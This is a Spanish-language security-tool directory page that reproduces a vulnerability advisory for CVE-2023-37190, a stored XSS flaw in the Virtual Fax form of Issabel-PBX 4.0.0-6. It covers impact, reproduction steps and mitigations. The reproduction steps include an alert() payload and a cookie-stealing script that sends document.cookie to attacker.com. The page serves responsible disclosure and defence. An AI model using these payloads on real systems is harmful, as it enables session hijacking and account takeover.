Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-37190 — Existe una vulnerabilidad de Cross-Site Scripting (XSS) almacenado en Issabel-PBX versión 4.0.0-6. La aplicación no sanea ni codifica adecuadamente la entrada proporcionada por el usuario antes de almacenarla en la base de datos y posteriormente renderizarla en la interfaz web. | Kitploit
Herramientas/GitHubGitHub/sahiloj/cve-2023-37190
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPapers e InvestigaciónAprendizaje y Educación
GitHubsahiloj/cve-2023-37190

CVE-2023-37190

Existe una vulnerabilidad de Cross-Site Scripting (XSS) almacenado en Issabel-PBX versión 4.0.0-6. La aplicación no sanea ni codifica adecuadamente la entrada proporcionada por el usuario antes de almacenarla en la base de datos y posteriormente renderizarla en la interfaz web.

Ver Repositorio
11hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-37190 — Issabel-PBX 4.0.0-6: Cross-Site Scripting (XSS) Almacenado

CVE Severity Type Affected Version


📋 Resumen

CampoDetalles
ID CVECVE-2023-37190
VulnerabilidadCross-Site Scripting (XSS) almacenado
Producto afectadoIssabel-PBX
Versión afectada4.0.0-6
SeveridadMedia (puntuación CVSS v3.1: 5.4)
Descubierto porSahil Ojha
Fecha de divulgación07 de julio de 2023
ProveedorIssabel
Código fuenteIssabelFoundation/issabelPBX
Probado enWindows

📝 Descripción

Existe una vulnerabilidad de Cross-Site Scripting (XSS) almacenado en Issabel-PBX versión 4.0.0-6. La aplicación no sanea ni codifica adecuadamente la entrada proporcionada por el usuario antes de almacenarla en la base de datos y posteriormente mostrarla en la interfaz web.

La vulnerabilidad está presente en el módulo Virtual Fax, específicamente en el formulario de creación "New Virtual Fax". Dos parámetros de entrada — Virtual Fax Name y Caller ID Name — no reciben una validación de entrada ni una codificación de salida adecuadas. Esto permite que un atacante autenticado con privilegios bajos inyecte y almacene permanentemente una carga útil de JavaScript malicioso dentro de la aplicación.

Una vez almacenada, el script malicioso se ejecuta automáticamente en el navegador de cualquier usuario (incluidos los administradores) que visite la página afectada, sin que el atacante requiera ninguna interacción adicional.


⚠️ Impacto

Un atacante que explote con éxito esta vulnerabilidad puede:

  • Robar cookies de sesión y secuestrar sesiones de usuarios autenticados, incluidas las cuentas de administrador.
  • Realizar acciones en nombre de las víctimas, como cambiar configuraciones, agregar usuarios o modificar ajustes del sistema.
  • Redirigir a los usuarios a páginas de phishing o distribución de malware controladas por el atacante.
  • Desfigurar la interfaz de la aplicación, afectando la experiencia del usuario y la confianza.
  • Distribuir malware o exploits de navegador a todos los usuarios que accedan a la página afectada.
  • Realizar keylogging o capturar información sensible introducida en la página.

Debido a que la carga útil está almacenada (persistente), afecta a todos los usuarios que visitan la página vulnerable hasta que se elimina, lo que la hace más grave que un XSS reflejado.


🔢 Puntuación CVSS v3.1


🔍 Detalles de la vulnerabilidad

  • Tipo de vulnerabilidad: Cross-Site Scripting almacenado (CWE-79)
  • Componente afectado: módulo Virtual Fax → formulario New Virtual Fax
  • Parámetros vulnerables:
    • Virtual Fax Name
    • Caller ID Name
  • Autenticación requerida: Sí (usuario autenticado con privilegios bajos)
  • Causa raíz: falta de saneamiento de entrada y codificación de salida en los parámetros afectados antes de almacenarlos en la base de datos y mostrarlos en la interfaz web.

🛠️ Pasos para reproducir

Requisitos previos

  • Una instancia en ejecución de Issabel-PBX versión 4.0.0-6.
  • Credenciales válidas para una cuenta con acceso al módulo Fax (usuario estándar o administrador).

Pasos de reproducción

Paso 1: Inicie sesión en la aplicación web de Issabel-PBX con credenciales válidas.

Paso 2: Navegue a Fax → Virtual Fax → New Virtual Fax.

Inyecte la siguiente carga útil XSS en los campos Virtual Fax Name y/o Caller ID Name:

root@kitploit:~
<script>alert('XSS-CVE-2023-37190')</script>

Para una prueba de concepto más impactante que demuestre el robo de cookies de sesión (tenga en cuenta que en ataques reales se usa HTTPS para evitar exponer las cookies robadas en tránsito):

root@kitploit:~
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>

El formulario completado con la carga útil inyectada debería verse similar a la captura de pantalla siguiente:

Paso 2 - Inyección de la carga útil XSS en los campos Virtual Fax Name y Caller ID Name

Paso 3: Haga clic en el botón Save para enviar el formulario. La carga útil queda almacenada de forma persistente en la base de datos de la aplicación.

Paso 4: Navegue a la página de listado de Virtual Fax (o haga que otro usuario, como un administrador, visite la página). El script almacenado se ejecutará automáticamente en el navegador del visitante, como se muestra a continuación:

Paso 4 - Carga útil XSS almacenada ejecutándose en el navegador


🩹 Mitigación y remediación

Se recomienda encarecidamente a los usuarios y administradores de Issabel-PBX que apliquen las siguientes medidas:

  1. Validación de entrada: aplique una validación estricta en el servidor para todas las entradas proporcionadas por el usuario. Rechace o sanea las entradas que contengan caracteres especiales HTML (<, >, ", ', &).
  2. Codificación de salida: aplique codificación de salida según el contexto (codificación de entidades HTML) al mostrar datos proporcionados por el usuario en la interfaz web para evitar la ejecución de scripts.
  3. Política de seguridad de contenido (CSP): implemente una cabecera HTTP Content-Security-Policy estricta para limitar las fuentes desde las que se pueden ejecutar scripts, reduciendo el impacto de las vulnerabilidades XSS.
  4. Actualizar / Parchear: supervise el repositorio oficial de Issabel y aplique cualquier parche de seguridad publicado por el proveedor.
  5. Mínimo privilegio: restrinja el acceso a módulos sensibles como Virtual Fax solo a los usuarios que lo necesiten, limitando la superficie de ataque.

📚 Referencias

  • NVD - CVE-2023-37190
  • Entrada CVE de MITRE
  • Sitio web oficial de Issabel
  • IssabelFoundation/issabelPBX en GitHub
  • CWE-79: Neutralización incorrecta de la entrada durante la generación de páginas web ('Cross-site Scripting')
  • OWASP: Cross-Site Scripting (XSS)

👤 Autor

Sahil Ojha
Investigador de seguridad
GitHub: @sahiloj


Aviso legal: Este repositorio está destinado únicamente a fines educativos y de divulgación responsable. La información aquí proporcionada no debe utilizarse para atacar sistemas sin el permiso explícito por escrito del propietario del sistema. El autor no es responsable del mal uso de esta información.

Descargar herramienta
MétricaValor
Puntuación base5.4 (Media)
Vector de ataqueRed
Complejidad del ataqueBaja
Privilegios requeridosBajos
Interacción del usuarioRequerida
AlcanceCambiado
ConfidencialidadBaja
IntegridadBaja
DisponibilidadNinguna